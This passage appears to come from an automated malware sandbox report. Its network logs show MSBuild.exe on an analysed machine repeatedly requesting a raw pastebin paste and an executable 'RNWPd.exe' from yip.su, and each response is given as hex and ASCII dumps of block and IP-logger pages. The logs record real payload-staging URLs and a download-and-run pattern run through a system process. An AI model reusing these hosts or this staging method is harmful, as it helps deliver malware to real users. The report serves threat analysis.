61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:17 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:17 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49741	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:18 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:19 UTC	902	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:18 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4uTez3LM4ABBLyymTDc9%2FNdzuuOD1HVeasX7GwEQlPAYrOr5l2awWu6gVNi1M2qwZE4CoO3Sp8CXjO20mhaZjh2N%2BbRePrUbNhG9jj5oA%2FLUUyMvni%2FqgXM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433804fbe10ca1-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:19 UTC	467	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:19 UTC	1369	IN	Data Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
2024-09-16 19:21:19 UTC	1369	IN	Data Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
2024-09-16 19:21:19 UTC	1369	IN	Data Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
2024-09-16 19:21:19 UTC	1369	IN	Data Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
2024-09-16 19:21:19 UTC	1369	IN	Data Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
2024-09-16 19:21:19 UTC	158	IN	Data Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49743	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:23 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:24 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c43382969847298-EWR
2024-09-16 19:21:24 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:24 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:24 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:24 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49744	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:25 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:25 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:25 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:25 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlOFPkX4GdtIU1v1EaFrSJ1RH4fYVpZyrnc5O3BFxrcCeN5xg36dUF6GEOoq1CVfW2AGa%2BIxvsYSNjwJFOKKNH5233veKXNhLwcbGO2paJpQPmnCGycUOrE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c43382ef84a8c3b-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:25 UTC	473	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:25 UTC	1369	IN	Data Raw: 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f Data Ascii: content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="o
2024-09-16 19:21:25 UTC	1369	IN	Data Raw: 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73 Data Ascii: r:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s
2024-09-16 19:21:25 UTC	1369	IN	Data Raw: 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e Data Ascii: ntData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.
2024-09-16 19:21:25 UTC	1369	IN	Data Raw: 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 